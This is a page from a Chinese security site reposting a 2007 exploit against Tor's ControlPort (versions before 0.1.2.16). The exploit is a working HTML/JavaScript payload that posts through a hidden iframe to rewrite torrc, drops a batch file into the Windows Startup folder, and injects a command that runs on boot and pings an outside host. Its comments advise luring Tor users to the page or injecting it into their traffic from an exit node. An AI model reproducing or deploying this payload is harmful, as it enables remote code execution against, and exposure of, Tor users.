首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Tor < 0.1.2.16 ControlPort Remote Rewrite Exploit 来源：elgCrew _AT_ safe-mail.net 作者：elgCrew 发布时间：2007-09-30   <!-- Tor < 0.1.2.16 with ControlPort enabled ( not default ) Exploit for Tor ControlPort "torrc" Rewrite Vulnerability http://secunia.com/advisories/26301 Rewrites the torrc to log to a different location: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\t.bat Also enables debug logging, and an erroneous ExitPolicy looking something like this: reject*:1337\'&' calc.exe  this will output: [debug] parse_addr_policy(): Adding new entry 'reject*:1337'& calc.exe to the debug log -> t.bat which will run calc.exe on next boot. This is not very silent though, t.bat will contain something like 45 rows of crap which the user will see in about 1 sec, drop me a mail if you have a better way. Either have a TOR user visit this HTML or inject it into her traffic when you're a TOR exit. If you inject, just replace </HEAD> with everything in <HEAD> + </HEAD> ( that's why I tried to fit everything inside <HEAD />), and fix Content-Length // elgCrew _AT_ safe-mail.net --> <html> <head> <script language="javascript"> window.onload = function() { cmd = 'cls & echo off & ping -l 1329 my.tcpdump.co -n 1 -w 1 > NUL & del t.bat > NUL & exit'; inject = '\r\nAUTHENTICATE\r\nSETCONF Log=\"debug-debug file C:\\\\Documents and Settings\\\\All Users\\\\Start Menu\\\\Programs\\\\Startup\\\\t.bat\"\r\nSAVECONF\r\nSIGNAL RELOAD\r\nSETCONF ExitPolicy=\"reject*:1337\\\'&' + cmd + '&\"\r\nSETCONF Log=\"info file c:\\\\tor.txt\"\r\nSAVECONF\r\nSIGNAL RELOAD\r\n'; form51.area51.value = inject; document.form51.submit(); } </script> <form target="hiddenframe" name="form51" action="http://localhost.mil.se:9051" method=POST enctype="multipart/form-data"> <input type=hidden name=area51> </form> <iframe width=0 height=0 frameborder=0 name="hiddenframe"></iframe> </head> <body> <pre>   ---- | y0! |   ----           \  \_\_    _/_/            \     (oo)\_______                  |_|\        )*                      ||----w |                      ||     || </pre> </body> </html>   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Zomplog <= 3.8.1 upload_files. ·MDPro 1.0.76 Remote SQL Inject ·Linux Kernel 2.4/2.6 x86-64 Sy ·ELSE IF CMS 0.6 Multiple Remot ·CMS Creamotion (securite.php) ·Motorola Timbuktu Pro 8.6.3 Ar ·wzdftpd <= 0.8.0 (USER) Remote ·EB Design Pty Ltd (EBCRYPT.DLL ·PHP Homepage M 1.0 galerie.php ·AskJeeves Toolbar 4.0.2.53 act ·LightBlog 8.4.1.1 Remote Code ·Xitami Web Server 2.5 (If-Modi   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved